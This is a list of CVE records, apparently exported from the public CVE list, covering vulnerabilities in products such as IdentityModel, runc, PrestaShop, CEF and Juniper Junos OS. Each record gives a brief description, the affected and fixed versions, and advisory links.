CVE    2024    21643    Candidate    IdentityModel Extensions for .NET provide assemblies for web developers that wish to use federated identity providers for establishing the caller's identity. Anyone leveraging the `SignedHttpRequest` protocol or the `SignedHttpRequestValidator` is vulnerable. Microsoft.IdentityModel trusts the `jku` claim by default for the `SignedHttpRequest` protocol. This raises the possibility to make any remote or local `HTTP GET` request. The vulnerability has been fixed in Microsoft.IdentityModel.Protocols.SignedHttpRequest. Users should update all their Microsoft.IdentityModel versions to 7.1.2 (for 7x) or higher, 6.34.0 (for 6x) or higher.    MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/6.34.0   |   URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/6.34.0   |   MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/7.1.2   |   URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/releases/tag/7.1.2   |   MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-rv9j-c866-gp5h   |   URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-rv9j-c866-gp5h   |   MISC:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/wiki/jkucve   |   URL:https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/wiki/jkucve    Assigned (20231229)
CVE    2024    21642    Candidate    D-Tale is a visualizer for Pandas data structures. Users hosting D-Tale versions prior to 3.9.0 publicly can be vulnerable to server-side request forgery (SSRF), allowing attackers to access files on the server. Users should upgrade to version 3.9.0, where the `Load From the Web` input is turned off by default. The only workaround for versions earlier than 3.9.0 is to host D-Tale only for trusted users.    MISC:https://github.com/man-group/dtale/commit/954f6be1a06ff8629ead2c85c6e3f8e2196b3df2   |   URL:https://github.com/man-group/dtale/commit/954f6be1a06ff8629ead2c85c6e3f8e2196b3df2   |   MISC:https://github.com/man-group/dtale/security/advisories/GHSA-7hfx-h3j3-rwq4   |   URL:https://github.com/man-group/dtale/security/advisories/GHSA-7hfx-h3j3-rwq4   |   MISC:https://github.com/man-group/dtale?tab=readme-ov-file#load-data--sample-datasets   |   URL:https://github.com/man-group/dtale?tab=readme-ov-file#load-data--sample-datasets    Assigned (20231229)
CVE    2024    21641    Candidate    Flarum is open source discussion platform software. Prior to version 1.8.5, the Flarum `/logout` route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to any link. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation. The vulnerability has been fixed and published as flarum/core v1.8.5. As a workaround, some extensions modifying the logout route can remedy this issue if their implementation is safe.    MISC:https://github.com/flarum/flarum-core/commit/ee8b3b4ad1413a2b0971fdd9e40f812d2a3a9d3a   |   URL:https://github.com/flarum/flarum-core/commit/ee8b3b4ad1413a2b0971fdd9e40f812d2a3a9d3a   |   MISC:https://github.com/flarum/framework/commit/7d70328471cf3091d92d95c382d277aec7996176   |   URL:https://github.com/flarum/framework/commit/7d70328471cf3091d92d95c382d277aec7996176   |   MISC:https://github.com/flarum/framework/security/advisories/GHSA-733r-8xcp-w9mr   |   URL:https://github.com/flarum/framework/security/advisories/GHSA-733r-8xcp-w9mr    Assigned (20231229)
CVE    2024    21640    Candidate    Chromium Embedded Framework (CEF) is a simple framework for embedding Chromium-based browsers in other applications. `CefVideoConsumerOSR::OnFrameCaptured` does not check `pixel_format` properly, which leads to out-of-bounds read out of the sandbox. This vulnerability was patched in commit 1f55d2e.    MISC:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b   |   URL:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b   |   MISC:https://github.com/chromiumembedded/cef/security/advisories/GHSA-3h3j-38xq-v7hh   |   URL:https://github.com/chromiumembedded/cef/security/advisories/GHSA-3h3j-38xq-v7hh    Assigned (20231229)
CVE    2024    21639    Candidate    CEF (Chromium Embedded Framework) is a simple framework for embedding Chromium-based browsers in other applications. `CefLayeredWindowUpdaterOSR::OnAllocatedSharedMemory` does not check the size of the shared memory, which leads to out-of-bounds read outside the sandbox. This vulnerability was patched in commit 1f55d2e.    MISC:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b   |   URL:https://github.com/chromiumembedded/cef/commit/1f55d2e12f62cfdfbf9da6968fde2f928982670b   |   MISC:https://github.com/chromiumembedded/cef/security/advisories/GHSA-m375-jw5x-x8mg   |   URL:https://github.com/chromiumembedded/cef/security/advisories/GHSA-m375-jw5x-x8mg    Assigned (20231229)
CVE    2024    21638    Candidate    Azure IPAM (IP Address Management) is a lightweight solution developed on top of the Azure platform designed to help Azure customers manage their IP Address space easily and effectively. By design there is no write access to customers' Azure environments as the Service Principal used is only assigned the Reader role at the root Management Group level. Until recently, the solution lacked validation of the passed-in authentication token, which may result in an attacker impersonating any privileged user to access data stored within the IPAM instance and subsequently from Azure, causing an elevation of privilege. This vulnerability has been patched in version 3.0.0.    MISC:https://github.com/Azure/ipam/commit/64ef2d07edf16ffa50f29c7e0e25d32d974b367f   |   URL:https://github.com/Azure/ipam/commit/64ef2d07edf16ffa50f29c7e0e25d32d974b367f   |   MISC:https://github.com/Azure/ipam/pull/218   |   URL:https://github.com/Azure/ipam/pull/218   |   MISC:https://github.com/Azure/ipam/security/advisories/GHSA-m8mp-jq4c-g8j6   |   URL:https://github.com/Azure/ipam/security/advisories/GHSA-m8mp-jq4c-g8j6    Assigned (20231229)
CVE    2024    21637    Candidate    Authentik is an open-source Identity Provider. Authentik is vulnerable to a reflected Cross-Site Scripting vulnerability via JavaScript-URIs in OpenID Connect flows with `response_mode=form_post`. This relatively user could use the described attacks to perform a privilege escalation. This vulnerability has been patched in versions 2023.10.6 and 2023.8.6.    MISC:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.10.6   |   URL:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.10.6   |   MISC:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.8.6   |   URL:https://github.com/goauthentik/authentik/releases/tag/version%2F2023.8.6   |   MISC:https://github.com/goauthentik/authentik/security/advisories/GHSA-rjpr-7w8c-gv3j   |   URL:https://github.com/goauthentik/authentik/security/advisories/GHSA-rjpr-7w8c-gv3j    Assigned (20231229)
CVE    2024    21636    Candidate    view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. Versions prior to 3.9.0 and 2.83.0 have a cross-site scripting vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a `#call` method (i.e. instead of using a sidecar template) are affected. The return value of the `#call` method is not sanitized and can include user-defined content. In addition, the return value of the `#output_postamble` method is not sanitized, which can also lead to cross-site scripting issues. Versions 3.9.0 and 2.83.0 have been released and fully mitigate both the `#call` and the `#output_postamble` vulnerabilities. As a workaround, sanitize the return value of `#call`.    MISC:https://github.com/ViewComponent/view_component/commit/0d26944a8d2730ea40e60eae23d70684483e5017   |   URL:https://github.com/ViewComponent/view_component/commit/0d26944a8d2730ea40e60eae23d70684483e5017   |   MISC:https://github.com/ViewComponent/view_component/commit/c43d8bafa7117cbce479669a423ab266de150697   |   URL:https://github.com/ViewComponent/view_component/commit/c43d8bafa7117cbce479669a423ab266de150697   |   MISC:https://github.com/ViewComponent/view_component/pull/1950   |   URL:https://github.com/ViewComponent/view_component/pull/1950   |   MISC:https://github.com/ViewComponent/view_component/pull/1962   |   URL:https://github.com/ViewComponent/view_component/pull/1962   |   MISC:https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37   |   URL:https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37    Assigned (20231229)
CVE    2024    21634    Candidate    Amazon Ion is a Java implementation of the Ion data notation. Prior to version 1.10.5, a potential denial-of-service issue exists in `ion-java` for applications that use `ion-java` to deserialize Ion text encoded data, or deserialize Ion text or binary encoded data into the `IonValue` model and then invoke certain `IonValue` methods on that in-memory representation. An actor could craft Ion data that, when loaded by the affected application and/or processed using the `IonValue` model, results in a `StackOverflowError` originating from the `ion-java` library. The patch is included in `ion-java` 1.10.5. As a workaround, do not load data which originated from an untrusted source or that could have been tampered with.    MISC:https://github.com/amazon-ion/ion-java/security/advisories/GHSA-264p-99wq-f4j6   |   URL:https://github.com/amazon-ion/ion-java/security/advisories/GHSA-264p-99wq-f4j6    Assigned (20231229)
CVE    2024    21633    Candidate    Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names, which can be manipulated by an attacker to place files at a desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that the user has write access to, and either the user name is known or cwd is under the user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue.    MISC:https://github.com/iBotPeaches/Apktool/commit/d348c43b24a9de350ff6e5bd610545a10c1fc712   |   URL:https://github.com/iBotPeaches/Apktool/commit/d348c43b24a9de350ff6e5bd610545a10c1fc712   |   MISC:https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-2hqv-2xv4-5h5w   |   URL:https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-2hqv-2xv4-5h5w    Assigned (20231229)
CVE    2024    21632    Candidate    omniauth-microsoft_graph provides an Omniauth strategy for the Microsoft Graph API. Prior to version 2.0.0, the implementation did not validate the legitimacy of the `email` attribute of the user nor did it give/document an option to do so, making it susceptible to nOAuth misconfiguration in cases when the `email` is used as a trusted user identifier. This could lead to account takeover. Version 2.0.0 contains a fix for this issue.    MISC:https://github.com/synth/omniauth-microsoft_graph/commit/f132078389612b797c872b45bd0e0b47382414c1   |   URL:https://github.com/synth/omniauth-microsoft_graph/commit/f132078389612b797c872b45bd0e0b47382414c1   |   MISC:https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj   |   URL:https://github.com/synth/omniauth-microsoft_graph/security/advisories/GHSA-5g66-628f-7cvj   |   MISC:https://www.descope.com/blog/post/noauth   |   URL:https://www.descope.com/blog/post/noauth    Assigned (20231229)
CVE    2024    21631    Candidate    Vapor is an HTTP web framework for Swift. Prior to version 4.90.0, Vapor's `vapor_urlparser_parse` function uses `uint16_t` indexes when parsing a URI's components, which may cause integer overflows when parsing untrusted inputs. This vulnerability does not affect Vapor directly but could impact applications relying on the URI type for validating user input. The URI type is used in several places in Vapor. A developer may decide to use URI to represent a URL in their application (especially if that URL is then passed to the HTTP Client) and rely on its public properties and methods. However, URI may fail to properly parse a valid (albeit abnormally long) URL, due to string ranges being converted to 16-bit integers. An attacker may use this behavior to trick the application into accepting a URL to an untrusted destination. By padding the port number with zeros, an attacker can cause an integer overflow to occur when the URL authority is parsed and, as a result, spoof the host. Version 4.90.0 contains a patch for this issue. As a workaround, validate user input before parsing as a URI or, if possible, use Foundation's `URL` and `URLComponents` utilities.    MISC:https://github.com/vapor/vapor/commit/6db3d917b5ce5024a84eb265ef65691383305d70   |   URL:https://github.com/vapor/vapor/commit/6db3d917b5ce5024a84eb265ef65691383305d70   |   MISC:https://github.com/vapor/vapor/security/advisories/GHSA-r6r4-5pr8-gjcp   |   URL:https://github.com/vapor/vapor/security/advisories/GHSA-r6r4-5pr8-gjcp    Assigned (20231229)
CVE    2024    21630    Candidate    Zulip is an open-source team collaboration tool. A vulnerability in version 8.0 is similar to CVE-2023-32677, but applies to multi-use invitations, not single-use invitation links as in the prior CVE. Specifically, it applies when the installation has configured non-admins to be able to invite users and create multi-use invitations, and has also configured only admins to be able to invite users to streams. As in CVE-2023-32677, this does not let users invite new users to arbitrary streams, only to streams that the inviter can already see. Version 8.1 fixes this issue. As a workaround, administrators can limit sending of invitations down to users who also have the permission to add users to streams.    MISC:https://github.com/zulip/zulip/commit/0df7bd71f32f3b772e2646c6ab0d60c9b610addf   |   URL:https://github.com/zulip/zulip/commit/0df7bd71f32f3b772e2646c6ab0d60c9b610addf   |   MISC:https://github.com/zulip/zulip/security/advisories/GHSA-87p9-wprh-7rm6   |   URL:https://github.com/zulip/zulip/security/advisories/GHSA-87p9-wprh-7rm6   |   MISC:https://github.com/zulip/zulip/security/advisories/GHSA-mrvp-96q6-jpvc   |   URL:https://github.com/zulip/zulip/security/advisories/GHSA-mrvp-96q6-jpvc   |   MISC:https://zulip.com/help/configure-who-can-invite-to-streams   |   URL:https://zulip.com/help/configure-who-can-invite-to-streams   |   MISC:https://zulip.com/help/restrict-account-creation#change-who-can-send-invitations   |   URL:https://zulip.com/help/restrict-account-creation#change-who-can-send-invitations    Assigned (20231229)
CVE    2024    21629    Candidate    Rust EVM is an Ethereum Virtual Machine interpreter. In `rust-evm`, a feature called `record_external_operation` was introduced, allowing library users to record custom gas changes. This feature can have some bogus interactions with the call stack. In particular, during finalization of a `CREATE` or `CREATE2`, in the case that the substack execution happens successfully, `rust-evm` will first commit the substate, and then call `record_external_operation(Write(out_code.len()))`. If `record_external_operation` later fails, this error is returned to the parent call stack, instead of `Succeeded`. Yet, the substate commitment already happened. This causes smart contracts able to commit state changes, when the parent caller contract receives zero address (which usually indicates that the execution has failed). This issue only impacts library users with custom `record_external_operation` that returns errors. The issue is patched in release 0.41.1. No known workarounds are available.    MISC:https://github.com/rust-ethereum/evm/blob/release-v041/src/executor/stack/executor.rs#L1012C25-L1012C69   |   URL:https://github.com/rust-ethereum/evm/blob/release-v041/src/executor/stack/executor.rs#L1012C25-L1012C69   |   MISC:https://github.com/rust-ethereum/evm/commit/d8991ec727ad0fb64fe9957a3cd307387a6701e4   |   URL:https://github.com/rust-ethereum/evm/commit/d8991ec727ad0fb64fe9957a3cd307387a6701e4   |   MISC:https://github.com/rust-ethereum/evm/pull/264   |   URL:https://github.com/rust-ethereum/evm/pull/264   |   MISC:https://github.com/rust-ethereum/evm/security/advisories/GHSA-27wg-99g8-2v4v   |   URL:https://github.com/rust-ethereum/evm/security/advisories/GHSA-27wg-99g8-2v4v    Assigned (20231229)
CVE    2024    21628    Candidate    PrestaShop is an open-source e-commerce platform. Prior to version 8.1.3, the isCleanHtml method is not used on this form, which makes it possible to store a cross-site scripting payload in the database. The impact is low because the HTML is not interpreted in BO, thanks to twig's escape mechanism. In FO, the cross-site scripting attack is effective, but only impacts the customer sending it, or the customer session from which it was sent. This issue affects those who have a module fetching these messages from the DB and displaying it without escaping HTML. Version 8.1.3 contains a patch for this issue.    MISC:https://github.com/PrestaShop/PrestaShop/commit/c3d78b7e49f5fe49a9d07725c3174d005deaa597   |   URL:https://github.com/PrestaShop/PrestaShop/commit/c3d78b7e49f5fe49a9d07725c3174d005deaa597   |   MISC:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-vr7m-r9vm-m4wf   |   URL:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-vr7m-r9vm-m4wf    Assigned (20231229)
CVE    2024    21627    Candidate    PrestaShop is an open-source e-commerce platform. Prior to versions 8.1.3 and 1.7.8.11, some event attributes are not detected by the `isCleanHTML` method. Some modules using the `isCleanHTML` method could be vulnerable to cross-site scripting. Versions 8.1.3 and 1.7.8.11 contain a patch for this issue. The best workaround is to use the `HTMLPurifier` library to sanitize html input coming from users. The library is already available as a dependency in the PrestaShop project. Beware though that in legacy object models, fields of `HTML` type will call `isCleanHTML`.    MISC:https://github.com/PrestaShop/PrestaShop/commit/73cfb44666818eefd501b526a894fe884dd12129   |   URL:https://github.com/PrestaShop/PrestaShop/commit/73cfb44666818eefd501b526a894fe884dd12129   |   MISC:https://github.com/PrestaShop/PrestaShop/commit/ba06d18466df5b92cb841d504cc7210121104883   |   URL:https://github.com/PrestaShop/PrestaShop/commit/ba06d18466df5b92cb841d504cc7210121104883   |   MISC:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-xgpm-q3mq-46rq   |   URL:https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-xgpm-q3mq-46rq    Assigned (20231229)
CVE    2024    21626    Candidate    runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.    FEDORA:FEDORA-2024-900dc7f6ff   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYMO3BANINS6RGFQFKPRG4FIOJ7GWYTL/   |   FEDORA:FEDORA-2024-9044c9eefa   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2NLXNE23Q5ESQUAI22Z7A63JX2WMPJ2J/   |   MISC:http://packetstormsecurity.com/files/176993/runc-1.1.11-File-Descriptor-Leak-Privilege-Escalation.html   |   MISC:https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf   |   URL:https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf   |   MISC:https://github.com/opencontainers/runc/releases/tag/v1.1.12   |   URL:https://github.com/opencontainers/runc/releases/tag/v1.1.12   |   MISC:https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv   |   URL:https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv   |   MLIST:[debian-lts-announce] 20240219 [SECURITY] [DLA 3735-1] runc security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00005.html   |   MLIST:[oss-security] 20240201 Re: runc: CVE-2024-21626: high severity container breakout attack   |   URL:http://www.openwall.com/lists/oss-security/2024/02/01/1   |   MLIST:[oss-security] 20240202 Re: Re: runc: CVE-2024-21626: high severity container breakout attack   |   URL:http://www.openwall.com/lists/oss-security/2024/02/02/3    Assigned (20231229)
CVE    2024    21625    Candidate    SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol (`sidequest://`) to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a one-click remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly.    MISC:https://github.com/SideQuestVR/SideQuest/security/advisories/GHSA-3v86-cf9q-x4x7   |   URL:https://github.com/SideQuestVR/SideQuest/security/advisories/GHSA-3v86-cf9q-x4x7    Assigned (20231229)
CVE    2024    21624    Candidate    nonebot2 is a cross-platform Python asynchronous chatbot framework written in Python. This security advisory pertains to a potential information leak (e.g., environment variables) in instances where developers utilize `MessageTemplate` and incorporate user-provided data into templates. The identified vulnerability has been remedied in pull request #2509 and will be included in versions released from 2.2.0. Users are strongly advised to upgrade to these patched versions to safeguard against the vulnerability. A temporary workaround involves filtering underscores before incorporating user input into the message template.    MISC:https://github.com/nonebot/nonebot2/pull/2509   |   URL:https://github.com/nonebot/nonebot2/pull/2509   |   MISC:https://github.com/nonebot/nonebot2/security/advisories/GHSA-59j8-776v-xxxg   |   URL:https://github.com/nonebot/nonebot2/security/advisories/GHSA-59j8-776v-xxxg    Assigned (20231229)
CVE    2024    21623    Candidate    OTClient is an alternative Tibia client for otserv. Prior to commit db560de0b56476c87a2f967466407939196dd254, the /mehah/otclient "`Analysis - SonarCloud`" workflow is vulnerable to an expression injection in Actions, allowing an attacker to run commands remotely on the runner, leak secrets, and alter the repository using this workflow. Commit db560de0b56476c87a2f967466407939196dd254 contains a fix for this issue.    MISC:https://github.com/mehah/otclient/blob/72744edc3b9913b920e0fd12e929604f682fda75/.github/workflows/analysis-sonarcloud.yml#L91-L104   |   URL:https://github.com/mehah/otclient/blob/72744edc3b9913b920e0fd12e929604f682fda75/.github/workflows/analysis-sonarcloud.yml#L91-L104   |   MISC:https://github.com/mehah/otclient/commit/db560de0b56476c87a2f967466407939196dd254   |   URL:https://github.com/mehah/otclient/commit/db560de0b56476c87a2f967466407939196dd254   |   MISC:https://github.com/mehah/otclient/security/advisories/GHSA-q6gr-wc79-v589   |   URL:https://github.com/mehah/otclient/security/advisories/GHSA-q6gr-wc79-v589   |   MISC:https://securitylab.github.com/research/github-actions-preventing-pwn-requests/   |   URL:https://securitylab.github.com/research/github-actions-preventing-pwn-requests/   |   MISC:https://securitylab.github.com/research/github-actions-untrusted-input/   |   URL:https://securitylab.github.com/research/github-actions-untrusted-input/    Assigned (20231229)
CVE    2024    21622    Candidate    Craft is a content management system. This is a potential moderate impact, low complexity privilege escalation vulnerability in Craft starting in 3.x prior to 3.9.6 and 4.x prior to 4.4.16 with certain user permissions setups. This has been fixed in Craft 4.4.16 and Craft 3.9.6. Users should ensure they are running at least those versions.    MISC:https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4511---2023-11-16   |   URL:https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4511---2023-11-16   |   MISC:https://github.com/craftcms/cms/blob/v3/CHANGELOG.md#396---2023-11-16   |   URL:https://github.com/craftcms/cms/blob/v3/CHANGELOG.md#396---2023-11-16   |   MISC:https://github.com/craftcms/cms/commit/76caf9af07d9964be0fd362772223be6a5f5b6aa   |   URL:https://github.com/craftcms/cms/commit/76caf9af07d9964be0fd362772223be6a5f5b6aa   |   MISC:https://github.com/craftcms/cms/commit/be81eb653d633833f2ab22510794abb6bb9c0843   |   URL:https://github.com/craftcms/cms/commit/be81eb653d633833f2ab22510794abb6bb9c0843   |   MISC:https://github.com/craftcms/cms/pull/13931   |   URL:https://github.com/craftcms/cms/pull/13931   |   MISC:https://github.com/craftcms/cms/pull/13932   |   URL:https://github.com/craftcms/cms/pull/13932   |   MISC:https://github.com/craftcms/cms/security/advisories/GHSA-j5g9-j7r4-6qvx   |   URL:https://github.com/craftcms/cms/security/advisories/GHSA-j5g9-j7r4-6qvx    Assigned (20231229)
CVE    2024    21620    Candidate    An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an attacker to construct a URL that when visited by another user enables the attacker to execute commands with the target's permissions, including an administrator. A specific invocation of the emit_debug_note method in webauth_operation.php will echo back the data it receives. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S10; * 21.2 versions earlier than 21.2R3-S8; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3-S1; * 23.2 versions earlier than 23.2R2; * 23.4 versions earlier than 23.4R2.    MISC:https://supportportal.juniper.net/JSA76390   |   URL:https://supportportal.juniper.net/JSA76390    Assigned (20231227)
CVE    2024    2162    Candidate    An OS Command Injection vulnerability in Kiloview NDI allows a low-privileged user to execute arbitrary code remotely on the device with high privileges. This issue affects Kiloview NDI N3, N3-s, N4, N20, N30, N40 and was fixed in Firmware version 2.02.0227.    MISC:https://www.kiloview.com/en/support/download/1779/   |   URL:https://www.kiloview.com/en/support/download/1779/   |   MISC:https://www.kiloview.com/en/support/download/n20-firmware-download/   |   URL:https://www.kiloview.com/en/support/download/n20-firmware-download/   |   MISC:https://www.kiloview.com/en/support/download/n3-for-ndi/   |   URL:https://www.kiloview.com/en/support/download/n3-for-ndi/   |   MISC:https://www.kiloview.com/en/support/download/n3-s-firmware-download/   |   URL:https://www.kiloview.com/en/support/download/n3-s-firmware-download/   |   MISC:https://www.kiloview.com/en/support/download/n30-for-ndi/   |   URL:https://www.kiloview.com/en/support/download/n30-for-ndi/   |   MISC:https://www.kiloview.com/en/support/download/n40/   |   URL:https://www.kiloview.com/en/support/download/n40/    Assigned (20240304)
CVE    2024    21619    Candidate    A Missing Authentication for Critical Function vulnerability combined with a Generation of Error Message Containing Sensitive Information vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to access sensitive system information. When a user logs in, a temporary file which contains the configuration of the device (as visible to that user) is created in the /cache folder. An unauthenticated attacker can then attempt to access such a file by sending a specific request to the device trying to guess the name of such a file. Successful exploitation will reveal configuration information. This issue affects Juniper Networks Junos OS on SRX Series and EX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S6; * 22.1 versions earlier than 22.1R3-S5; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R3; * 23.2 versions earlier than 23.2R1-S2, 23.2R2.    MISC:https://supportportal.juniper.net/JSA76390   |   URL:https://supportportal.juniper.net/JSA76390    Assigned (20231227)
CVE    2024    21617    Candidate    An Incomplete Cleanup vulnerability in Nonstop active routing (NSR) component of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause memory leak leading to Denial of Service (DoS). On all Junos OS platforms, when NSR is enabled, a BGP flap will cause memory leak. A manual reboot of the system will restore the services. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. The memory usage can be monitored using the below commands. user@host> show chassis routing-engine no-forwarding user@host> show system memory | no-more This issue affects: Juniper Networks Junos OS * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S4; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S2; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R2-S1, 22.3R3; * 22.4 versions earlier than 22.4R1-S2, 22.4R2. This issue does not affect Junos OS versions earlier than 20.4R3-S7.    MISC:https://supportportal.juniper.net/JSA75758   |   URL:https://supportportal.juniper.net/JSA75758   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21616    Candidate    An Improper Validation of Syntactic Correctness of Input vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). On all Junos OS MX Series and SRX Series platforms, when SIP ALG is enabled, and a specific SIP packet is received and processed, NAT IP allocation fails for genuine traffic, which causes Denial of Service (DoS). Continuous receipt of this specific SIP ALG packet will cause a sustained DoS condition. NAT IP usage can be monitored by running the following command. user@srx> show security nat resource-usage source-pool <source_pool_name> Pool name: source_pool_name .. Address Factor-index Port-range Used Avail Total Usage X.X.X.X 0 Single Ports 50258 52342 62464 96% <<<<< - Alg Ports 0 2048 2048 0% This issue affects: Juniper Networks Junos OS on MX Series and SRX Series * All versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.    MISC:https://supportportal.juniper.net/JSA75757   |   URL:https://supportportal.juniper.net/JSA75757   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21614    Candidate    An Improper Check for Unusual or Exceptional Conditions vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based, unauthenticated attacker to cause rpd to crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when NETCONF and gRPC are enabled, and a specific query is executed via Dynamic Rendering (DREND), rpd will crash and restart. Continuous execution of this specific query will cause a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS * 22.2 versions earlier than 22.2R2-S2, 22.2R3; * 22.3 versions earlier than 22.3R2, 22.3R3. Juniper Networks Junos OS Evolved * 22.2 versions earlier than 22.2R2-S2-EVO, 22.2R3-EVO; * 22.3 versions earlier than 22.3R2-EVO, 22.3R3-EVO. This issue does not affect Juniper Networks: Junos OS versions earlier than 22.2R1; Junos OS Evolved versions earlier than 22.2R1-EVO.    MISC:https://supportportal.juniper.net/JSA75755   |   URL:https://supportportal.juniper.net/JSA75755   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
